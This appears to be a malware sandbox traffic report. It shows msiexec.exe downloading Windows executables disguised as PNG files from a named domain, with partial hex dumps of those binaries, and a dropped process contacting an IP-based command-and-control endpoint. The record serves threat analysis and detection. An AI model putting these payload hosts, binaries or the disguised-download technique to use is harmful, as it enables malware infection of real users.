                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:03.802505016 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 179
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:03.975414991 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:03.976695061 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 219
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:04.104751110 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:04.106086969 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 181
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:05.217828035 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:05.219234943 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:05.220309019 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:05.221962929 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.94971220.15.106.83807820C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
                              TimestampBytes transferredDirectionData
                              Aug 2, 2024 14:17:15.660221100 CEST191OUTGET /SCP/index.php?VS=VS3&PL=NAO HTTP/1.1
                              User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"
                              Host: 20.15.106.83
                              Connection: Keep-Alive
                              Aug 2, 2024 14:17:16.350012064 CEST256INHTTP/1.1 302 Found
                              Date: Fri, 02 Aug 2024 12:17:16 GMT
                              Server: Apache/2.4.58 (Ubuntu)
                              Location: https://acons2020temix54.lisf/
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 4e 65 77 20 59 6f 72 6b
                              Data Ascii: New York


                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.949706188.114.97.34437176C:\Windows\SysWOW64\msiexec.exe
                              TimestampBytes transferredDirectionData
                              2024-08-02 12:16:47 UTC164OUTGET /carol1.png HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                              Host: yznv.prefintions.pro
                              2024-08-02 12:16:48 UTC695INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:47 GMT
                              Content-Type: image/png
                              Content-Length: 702976
                              Connection: close
                              Last-Modified: Fri, 02 Aug 2024 00:37:11 GMT
                              ETag: "aba00-61ea88725bbc0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: MISS
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZC2%2Fv7CG48TKMwUOe12u0YxWOsjBgG%2Bklnz%2BHEJfdcRxvXDOLU1W13%2FnWNaqt8nVdi0xgkfNVPUTbrx6Wi6diYHtKe4snhO%2B3BWM07xghnIxgKXcd1zaVUDZCtdNW7%2FEWnDpSoXNmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ace0049cd335e66-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-02 12:16:48 UTC674INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 37 29 ac 66 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 e0 03 00 00 0e 00 00 00 00 00 00 fe fd 03 00 00 20 00 00 00 00 04 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 4c 00 04 00 28 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL7)f! @L(
                              2024-08-02 12:16:48 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii:
                              2024-08-02 12:16:48 UTC1369INData Raw: 27 00 00 6a 5a 2a 11 04 2a 11 04 15 6a 2e 10 11 04 17 6a 33 14 21 ff ff ff ff ff ff ff 7f 2a 21 00 00 00 00 00 00 00 80 2a 72 e7 00 00 70 12 04 28 28 00 00 0a 28 21 00 00 0a 73 4c 00 00 06 7a 72 17 01 00 70 12 03 fe 16 04 00 00 02 6f 20 00 00 0a 28 21 00 00 0a 73 4c 00 00 06 7a 02 6f 64 00 00 06 2a 72 b9 00 00 70 02 6f 4f 00 00 06 0a 12 00 fe 16 08 00 00 02 6f 20 00 00 0a 28 21 00 00 0a 73 4c 00 00 06 7a 00 13 30 05 00 9f 00 00 00 06 00 00 11 16 6a 0a 16 0b 16 0c 02 28 70 00 00 06 13 04 2b 37 09 17 59 45 03 00 00 00 02 00 00 00 0b 00 00 00 14 00 00 00 2b 1b 02 6f 77 00 00 06 0a 2b 18 02 6f 5a 00 00 06 0b 2b 0f 02 6f 5a 00 00 06 0c 2b 06 02 6f 76 00 00 06 02 6f 71 00 00 06 25 0d 16 30 be 11 04 02 28 6f 00 00 06 06 2d 09 07 2d 06 7e 29 00 00 0a 2a 06 15 6e
                              Data Ascii: 'jZ**j.j3!*!*rp(((!sLzrpo (!sLzod*rpoOo (!sLz0j(p+7YE+ow+oZ+oZ+ovoq%0(o--~)*n
                              2024-08-02 12:16:48 UTC1369INData Raw: 02 16 0d 09 39 9d 00 00 00 06 2c 73 02 6f 34 00 00 0a 13 06 02 75 23 00 00 01 2d 25 03 12 06 6f 18 00 00 06 10 02 04 16 2f 17 72 1c 02 00 70 11 06 6f 32 00 00 0a 28 21 00 00 0a 73 33 00 00 0a 7a 03 6f 19 00 00 06 11 06 12 05 6f 9b 00 00 06 11 05 2d 03 1a 2b 01 19 16 03 28 1b 00 00 06 03 28 3e 00 00 06 11 05 2d 16 1e 18 03 28 1b 00 00 06 03 11 06 6f 46 00 00 06 03 28 35 00 00 06 1f 0a 07 03 28 1b 00 00 06 02 75 23 00 00 01 2c 0e 02 74 23 00 00 01 03 28 35 00 00 06 2b 08 02 04 03 28 15 00 00 06 08 03 28 25 00 00 06 2a 5a 20 b2 07 00 00 17 17 16 16 16 16 73 35 00 00 0a 80 0e 00 00 04 2a 00 00 00 03 30 08 00 6e 00 00 00 00 00 00 00 04 2d 0b 72 30 0d 00 70 73 1b 00 00 0a 7a 04 7b 21 00 00 04 2d 0b 72 3e 0d 00 70 73 33 00 00 0a 7a 02 04 28 21 00 00 06 03 16 32
                              Data Ascii: 9,so4u#-%o/rpo2(!s3zoo-+((>-(oF(5(u#,t#(5+((%*Z s5*0n-r0psz{!-r>ps3z(!2
                              2024-08-02 12:16:48 UTC1369INData Raw: d4 2a 20 80 00 00 00 03 28 2c 00 00 06 02 03 7b 2a 00 00 04 03 7b 2b 00 00 04 03 7b 2a 00 00 04 8e 69 03 7b 2b 00 00 04 59 6f a9 00 00 0a 25 0c 16 31 1e 03 25 7b 2c 00 00 04 08 58 7d 2c 00 00 04 03 25 7b 2b 00 00 04 08 58 7d 2b 00 00 04 2b b1 2a c2 02 16 fe 04 16 fe 01 28 b2 00 00 06 03 25 7b 2b 00 00 04 02 58 7d 2b 00 00 04 03 25 7b 2c 00 00 04 02 58 7d 2c 00 00 04 03 15 7d 25 00 00 04 2a 26 02 03 16 28 24 00 00 06 2a 00 00 13 30 04 00 c3 00 00 00 0e 00 00 11 02 7b 28 00 00 04 2d 10 02 73 74 01 00 06 7d 28 00 00 04 38 9d 00 00 00 03 39 97 00 00 00 02 7b 28 00 00 04 03 6f 7e 01 00 06 25 0a 16 3f 83 00 00 00 72 5c 0f 00 70 28 ae 00 00 06 02 7b 28 00 00 04 6f 7b 01 00 06 0b 2b 1d 12 01 28 c9 01 00 06 0c 08 2c 08 08 6f 20 00 00 0a 2b 05 72 84 07 00 70 28 ae
                              Data Ascii: * (,{*{+{*i{+Yo%1%{,X},%{+X}++*(%{+X}+%{,X},}%*&($*0{(-st}(89{(o~%?r\p({(o{+(,o +rp(
                              2024-08-02 12:16:48 UTC1369INData Raw: 00 06 03 7b 2a 00 00 04 8e 69 03 7b 2b 00 00 04 59 02 32 01 2a 03 7c 2a 00 00 04 02 03 7b 2b 00 00 04 58 16 03 7b 2b 00 00 04 28 cc 00 00 06 2a 8a 02 7b 26 00 00 04 2d 08 02 7b 24 00 00 04 2c 0b 72 aa 10 00 70 73 33 00 00 0a 7a 02 28 2a 00 00 06 2a 72 02 7b 26 00 00 04 2d 08 02 7b 24 00 00 04 2c 0b 72 06 11 00 70 73 33 00 00 0a 7a 2a 1e 02 7b 21 00 00 04 2a c2 02 7b 24 00 00 04 2d 27 02 7b 2b 00 00 04 2c 1f 02 7b 20 00 00 04 02 7b 2a 00 00 04 16 02 7b 2b 00 00 04 6f bf 00 00 0a 02 16 7d 2b 00 00 04 2a 00 13 30 04 00 61 00 00 00 11 00 00 11 1b 03 28 2c 00 00 06 16 0a 03 7b 2a 00 00 04 03 25 7b 2b 00 00 04 0b 07 17 58 7d 2b 00 00 04 07 02 1f 7f 5f 20 80 00 00 00 60 d2 9c 06 17 58 0a 02 1d 64 25 10 00 2d d1 03 7b 2a 00 00 04 03 7b 2b 00 00 04 17 59 8f 2b 00
                              Data Ascii: {*i{+Y2*|*{+X{+(*{&-{$,rps3z(**r{&-{$,rps3z*{!*{$-'{+,{ {*{+o}+*0a(,{*%{+X}+_ `Xd%-{*{+Y+
                              2024-08-02 12:16:48 UTC1369INData Raw: 1f 18 63 d2 9c 06 07 1a 58 06 07 1b 58 06 07 1c 58 06 07 1d 58 16 25 0d 9c 09 25 0d 9c 09 25 0d 9c 09 9c 1e 03 28 20 00 00 06 2a 02 28 32 00 00 06 03 28 31 00 00 06 03 15 7d 25 00 00 04 2a 02 16 32 0f 02 03 28 31 00 00 06 03 15 7d 25 00 00 04 2a 1f 0a 03 28 2c 00 00 06 03 7b 2a 00 00 04 0a 03 7b 2b 00 00 04 0b 06 07 02 20 80 00 00 00 60 d2 9c 06 07 17 58 02 1d 63 20 80 00 00 00 60 d2 9c 06 07 18 58 02 1f 0e 63 20 80 00 00 00 60 d2 9c 06 07 19 58 02 1f 15 63 20 80 00 00 00 60 d2 9c 06 07 1a 58 02 1f 1c 63 20 80 00 00 00 60 d2 9c 06 07 1b 58 06 07 1c 58 06 07 1d 58 06 07 1e 58 20 ff 00 00 00 25 0d 9c 09 25 0d 9c 09 25 0d 9c 09 9c 06 07 1f 09 58 17 9c 1f 0a 03 28 20 00 00 06 2a 03 28 42 00 00 06 7a 00 00 13 30 02 00 4e 00 00 00 0c 00 00 11 03 2d 0b 72 30 0d
                              Data Ascii: cXXXX%%%( *(2(1}%*2(1}%*(,{*{+ `Xc `Xc `Xc `Xc `XXXX %%%X( *(Bz0N-r0
                              2024-08-02 12:16:48 UTC1369INData Raw: 58 0a 91 0b 04 04 4b 07 1f 7f 5f 1f 0e 62 60 54 07 20 80 00 00 00 5f 2d 02 19 2a 02 7b 41 00 00 04 19 33 07 02 28 87 00 00 06 7a 02 7b 3a 00 00 04 06 25 17 58 0a 91 0b 04 04 4b 07 1f 7f 5f 1f 15 62 60 54 07 20 80 00 00 00 5f 2d 02 1a 2a 02 7b 41 00 00 04 1a 33 07 02 28 87 00 00 06 7a 02 7b 3a 00 00 04 06 91 0b 04 04 4b 07 1f 1c 62 60 54 07 20 f0 00 00 00 5f 2d 02 1b 2a 03 2c 76 07 20 f0 00 00 00 5f 20 f0 00 00 00 33 68 02 7b 41 00 00 04 1f 0a 32 5e 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 4b 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 38 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 25 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 12 02 7b 3a 00 00 04 06 17 58 25 0a 91 17 33 03 1f 0a 2a 73 a8 00 00 0a 02 28 86 00 00
                              Data Ascii: XK_b`T _-*{A3(z{:%XK_b`T _-*{A3(z{:Kb`T _-*,v _ 3h{A2^{:X% 3K{:X% 38{:X% 3%{:X% 3{:X%3*s(
                              2024-08-02 12:16:48 UTC1369INData Raw: 40 00 00 04 02 02 7b 41 00 00 04 1e 59 7d 41 00 00 04 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1e 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 10 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 18 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 20 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 28 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 30 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 38 62 60 2a 02 28 66 00 00 06 28 63 00
                              Data Ascii: @{AY}A{:{?X}?n{:{?X}?nb`{:{?X}?nb`{:{?X}?nb`{:{?X}?n b`{:{?X}?n(b`{:{?X}?n0b`{:{?X}?n8b`*(f(c
                              2024-08-02 12:16:48 UTC1369INData Raw: 2d 11 72 15 09 00 70 73 33 00 00 0a 04 28 86 00 00 06 7a 04 28 70 00 00 06 03 16 32 12 04 7b 3b 00 00 04 03 02 04 6f 3e 01 00 06 10 00 2b 26 05 14 28 b1 00 00 0a 2c 17 04 7b 3b 00 00 04 04 16 17 05 0f 00 17 16 17 16 6f 37 01 00 06 2d 06 05 28 41 01 00 06 04 28 6f 00 00 06 02 2a 00 13 30 03 00 b3 00 00 00 0f 00 00 11 03 2d 0b 72 89 09 00 70 73 1b 00 00 0a 7a 02 7b 38 00 00 04 0a 03 7b 43 00 00 04 0b 07 1a 33 41 06 16 32 11 72 97 09 00 70 73 b2 00 00 0a 03 28 86 00 00 06 7a 06 65 03 7b 3c 00 00 04 2e 0c 03 72 a3 09 00 70 6f 6b 00 00 06 7a 03 15 7d 43 00 00 04 03 25 7b 3d 00 00 04 17 59 7d 3d 00 00 04 2a 06 03 7b 40 00 00 04 2f 0c 03 72 cf 09 00 70 6f 6b 00 00 06 7a 03 7b 42 00 00 04 03 7b 40 00 00 04 2e 19 03 7b 42 00 00 04 20 ff ff ff 7f 2e 0c 03 72 0b 0a
                              Data Ascii: -rps3(z(p2{;o>+&(,{;o7-(A(o*0-rpsz{8{C3A2rps(ze{<.rpokz}C%{=Y}=*{@/rpokz{B{@.{B .r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.949707188.114.97.34437176C:\Windows\SysWOW64\msiexec.exe
                              TimestampBytes transferredDirectionData
                              2024-08-02 12:16:49 UTC165OUTGET /derrama.png HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                              Host: yznv.prefintions.pro
                              2024-08-02 12:16:49 UTC685INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:49 GMT
                              Content-Type: image/png
                              Content-Length: 358000
                              Connection: close
                              Last-Modified: Fri, 16 Feb 2024 08:56:10 GMT
                              ETag: "57670-6117bea4f9e80"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: MISS
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4mZlDEbatzoGft89ux8rMPw9tIgH9I7J4MIoU8fYvGuXmfu8%2BliLI3TcPdYYKcojWTe4V9xOsQTxgmUW1fbjUbL0YPDOfbc2W7H41jEiSC4GXYjgkq9nFQBVmyFq24lUjUwl2WRvbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ace00558ccf17b5-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-02 12:16:49 UTC684INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba 9c 67 2e fe fd 09 7d fe fd 09 7d fe fd 09 7d 2d 8f 0a 7c f4 fd 09 7d 2d 8f 0c 7c 5b fd 09 7d ac 88 0d 7c ec fd 09 7d ac 88 0a 7c e9 fd 09 7d ac 88 0c 7c aa fd 09 7d 45 88 0c 7c fc fd 09 7d 2d 8f 0d 7c e9 fd 09 7d 2d 8f 0f 7c ff fd 09 7d 2d 8f 08 7c f0 fd 09 7d fe fd 09 7d fd fd 09 7d fe fd 08 7d 7b fc 09 7d 45 88 00 7c db fd 09 7d 45 88 f6 7d ff fd 09 7d fe fd 9e 7d ff fd 09
                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$g.}}}-|}-|[}|}|}|}E|}-|}-|}-|}}}}{}E|}E}}}
                              2024-08-02 12:16:49 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii:
                              2024-08-02 12:16:49 UTC1369INData Raw: ca 34 2b 7c d1 8d 34 26 47 10 56 52 51 8b 64 fc bc 6b ff 2e 6a 33 c9 66 89 0c 06 8b c7 c2 5b c5 08 00 3d fe ee 7e 83 17 3a 7f 0f 87 a7 77 f0 83 ce 07 81 fe 21 76 07 be 1f f6 bb ef 0d eb 1e 8b cb b8 11 d1 e9 2b c1 3b d8 2b 08 8d 04 19 0b 7e 68 f8 3b f0 0f 42 f0 c6 01 a4 00 13 3c 76 f8 89 de c5 db ed 77 14 89 c4 89 4f 10 ec 09 56 ff 75 a5 eb ef 6f e0 ce e4 ee eb 33 30 8b 07 8d 1c 5d 02 da 81 85 2d f8 c3 fb 00 50 72 12 8b 48 2e c3 23 bc 3c c1 c7 8e 37 0e f8 1f 77 1c 7a 53 50 a7 61 3a 7c 2b f8 08 89 07 59 2e 81 ab 5d 2c bf fd c5 18 1f d8 8b 4e 14 83 f9 b4 2d 8b 06 8d 0c 4d a4 69 4e 2e f9 50 c1 c2 f1 8a 8b fc 21 8b c2 51 ae 4d 33 c0 d1 f0 2e 58 51 40 06 5e c3 bf df ff fd 8b 8f 76 3d 86 7f 77 43 03 c0 3d b3 23 8d 48 23 3b 4d a7 1d f1 c8 76 33 51 7f 8b c8 1e 5e
                              Data Ascii: 4+|4&GVRQdk.j3f[=~:w!v+;+~h;B<vwOVuo30]-PrH.#<7wzSPa:|+Y.],N-MiN.P!QM3.XQ@^v=wC=#H#;Mv3Q^
                              2024-08-02 12:16:49 UTC1369INData Raw: 23 34 fc ec 55 51 44 8b f0 89 75 54 f6 3a 51 42 b8 de 32 c0 49 d4 ef 7a e2 03 05 db 0f 9e 8d 4e 1e d3 ee 8c 1b 32 ec 7b 20 f4 74 1e ed 15 a8 b6 7f 07 36 ef 0c 89 37 89 5f 04 f0 ff 06 a0 b0 01 ce 03 3f 5c cc 28 08 40 08 83 6e b7 06 3c 02 38 68 40 a7 3f c8 94 0c c8 6c 70 78 77 11 96 0c 64 bf a3 48 ab c4 1e 96 0c 73 3f 1d e5 80 01 4f fc 08 e8 bc 3a 4b ec 50 10 b9 41 cd 29 23 3e c0 08 97 ac e2 0c 01 fc 42 38 80 59 25 8e d4 f4 fe 4a 10 bc bb 08 06 f1 62 35 8d 85 23 50 53 6a 06 6a d5 03 1c df 10 75 1b ea 74 4d 61 c8 0b 83 e0 7a e9 fc 76 b4 7b a6 96 10 81 40 1e cb 40 2b ca 45 06 53 c3 84 02 56 de 68 a1 57 69 0b 28 e4 a4 f8 52 a1 da 62 17 cf 08 15 15 95 4c 8d 67 d6 fc 57 8d 51 01 66 90 8a 01 41 84 f9 9c 75 03 c8 6c d9 bf 10 6e 11 80 79 ff 5c 74 0b 49 25 20 77 ef
                              Data Ascii: #4UQDuT:QB2IzN2{ t67_?\(@n<8h@?lpxwdHs?O:KPA)#>B8Y%Jb5#PSjjutMazv{@@+ESVhWi(RbLgWQfAulny\tI% w
                              2024-08-02 12:16:49 UTC1369INData Raw: 38 ab 08 df a7 76 09 ee 34 3c 5d 3c e9 2b a9 35 52 a9 f8 ac 50 14 fb 44 08 a3 54 0a 7f 86 80 03 be 00 c5 4e 0c e4 28 53 b5 8f 34 06 68 ac f8 58 5f 5c 52 da f7 07 1a 2c c7 46 6c c5 c6 10 70 df 62 00 8c 42 a9 9e b8 04 3f 6a ec a9 14 1f 59 bc a7 8b 41 6c 56 87 b0 e0 eb 8d 71 6c cc 59 ca 0c ba 96 d1 55 54 7e 00 50 8d 8d fc eb 17 f2 85 15 50 f7 24 f3 8e 1c 70 16 fb 2f 38 0f ff 07 d9 20 bc 21 72 8d 50 01 90 8a 08 40 84 c9 3a c2 f5 5c b3 05 be 40 50 33 50 91 06 8d 48 11 56 8d df 7e d8 5e 1b c0 23 c1 7f 1f 0b e0 00 47 8b 35 d9 19 74 25 7e 83 cb ff 8b 4f 6c 8e 2b 8b c3 ad 83 df 0a f0 77 6c ff d2 6d 57 c7 47 ef 7f 17 3f b0 0c eb 8b 47 64 68 24 5e 18 4b 75 0f 19 69 01 69 60 64 54 64 68 ab 0a 68 58 8d 47 98 07 cf 1a 2c 80 c9 74 57 1d 8f 30 18 54 41 39 12 17 60 b6 b8
                              Data Ascii: 8v4<]<+5RPDTN(S4hX_\R,FlpbB?jYAlVqlYUT~PP$p/8 !rP@:\@P3PHV~^#G5t%~Ol+wlmWG?Gdh$^Kuii`dTdhhXG,tW0TA9`
                              2024-08-02 12:16:49 UTC1369INData Raw: 4d f8 22 8b 4f 28 28 3b c8 73 18 61 c3 03 0d 20 0c d8 29 5c 6a fc ed bb 8a 4c eb 39 50 52 8b d1 69 44 84 f6 05 5a 2a 13 f8 eb 0d 67 a9 3c ef 3d d8 89 6d f4 25 21 1c ee ef 8f e1 79 65 cf 8b c3 2b c6 1e 3b c7 73 36 c4 c3 25 34 d7 e5 45 d3 4a 47 f2 35 76 d2 70 14 e9 d8 53 08 be 82 74 e3 00 57 52 8b 21 f7 eb bc 01 fe 4f 05 bf 53 8b d9 56 89 5d f8 0f b7 43 f8 1f 0e 0f 7f 73 10 6b c0 2c 03 c6 ae 3b c8 84 74 3c 13 6f ff 41 da c6 24 57 0f 1f 40 f0 3e ff d0 57 75 a3 27 8e c1 06 b1 76 52 d8 b4 db fc fe 13 46 dc 3b c3 69 75 d6 f8 5f 98 5c 56 34 2b 12 86 5a 89 c2 04 10 f2 9a f5 24 63 3f 96 50 91 71 55 6b 21 35 f4 4d cf ac 8b ae 6c 4f 83 7e 04 bc 21 99 de 82 eb 8b 0e 8d d2 7a a7 19 e2 2b d6 43 9c 76 0c 35 06 ad 88 97 2e 15 d0 76 c8 10 74 30 f8 ff 7f 7f f9 8b f8 b8 cd
                              Data Ascii: M"O((;sa )\jL9PRiDZ*g<=m%!ye+;s6%4EJG5vpStWR!OSV]Csk,;t<oA$W@>Wu'vRF;iu_\V4+Z$c?PqUk!5MlO~!z+Cv5.vt0
                              2024-08-02 12:16:49 UTC1369INData Raw: 38 f0 e4 d4 89 10 8b cb 94 05 a2 2d 01 87 3b b6 29 cb 49 73 14 1f 53 d4 d4 c9 43 64 90 ec e8 ea d4 44 0f 44 43 66 17 f0 3b 30 14 1b 74 d8 39 a9 57 51 da 9c c8 ad 4e 28 4f 81 44 55 90 51 09 26 cc 56 94 fd c5 a3 50 05 53 4b 8b c7 eb 0b 13 ac 86 85 f1 d7 00 5b 43 51 44 56 11 1f 75 c6 c2 48 28 30 24 e0 9e 70 38 d4 33 f0 72 2b 0e c9 05 32 14 17 ec ec 06 a4 f2 62 0f cc 57 ba 34 1d 64 48 cf 3d 3e 05 48 a6 aa 18 09 7d e5 28 48 75 31 53 7b 18 28 58 58 62 04 48 55 a5 96 4b 04 18 45 09 e3 43 8a 0b a2 00 93 0c 37 1c 16 13 03 1f f0 5c f4 d0 20 c2 58 24 fc 94 3b 8b 37 00 1b 50 05 ec 5a 3f 69 db 4a a5 37 00 80 78 aa 74 21 10 04 7c 01 4e 58 75 14 de b0 08 75 0b 8b f0 ef 77 7b 2a 64 39 10 f0 eb 18 1c 0e 80 79 42 0e d9 d7 04 c3 66 90 92 40 c8 37 f4 b6 b6 13 76 bc 